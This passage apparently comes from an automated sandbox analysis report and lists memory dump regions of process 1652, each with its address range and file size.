                                                        Filesize

                                                        52KB

                                                      • memory/1652-392-0x00007FFBB8C40000-0x00007FFBB8C54000-memory.dmp
                                                        Filesize

                                                        80KB

                                                      • memory/1652-391-0x00007FFBAAFC0000-0x00007FFBAB08D000-memory.dmp
                                                        Filesize

                                                        820KB

                                                      • memory/1652-390-0x00007FFBB96F0000-0x00007FFBB9723000-memory.dmp
                                                        Filesize

                                                        204KB

                                                      • memory/1652-389-0x00007FFBBB360000-0x00007FFBBB36D000-memory.dmp
                                                        Filesize

                                                        52KB

                                                      • memory/1652-388-0x00007FFBBA750000-0x00007FFBBA769000-memory.dmp
                                                        Filesize

                                                        100KB

                                                      • memory/1652-387-0x00007FFBAB090000-0x00007FFBAB20E000-memory.dmp
                                                        Filesize

                                                        1.5MB

                                                      • memory/1652-386-0x00007FFBBA840000-0x00007FFBBA863000-memory.dmp
                                                        Filesize

                                                        140KB

                                                      • memory/1652-385-0x00007FFBBAF80000-0x00007FFBBAF99000-memory.dmp
                                                        Filesize

                                                        100KB

                                                      • memory/1652-384-0x00007FFBBB3C0000-0x00007FFBBB3ED000-memory.dmp
                                                        Filesize

                                                        180KB

                                                      • memory/1652-383-0x00007FFBBF0D0000-0x00007FFBBF0DF000-memory.dmp
                                                        Filesize

                                                        60KB

                                                      • memory/1652-382-0x00007FFBBF0F0000-0x00007FFBBF114000-memory.dmp
                                                        Filesize

                                                        144KB

                                                      • memory/1652-381-0x00007FFBAAA90000-0x00007FFBAAFB9000-memory.dmp
                                                        Filesize

                                                        5.2MB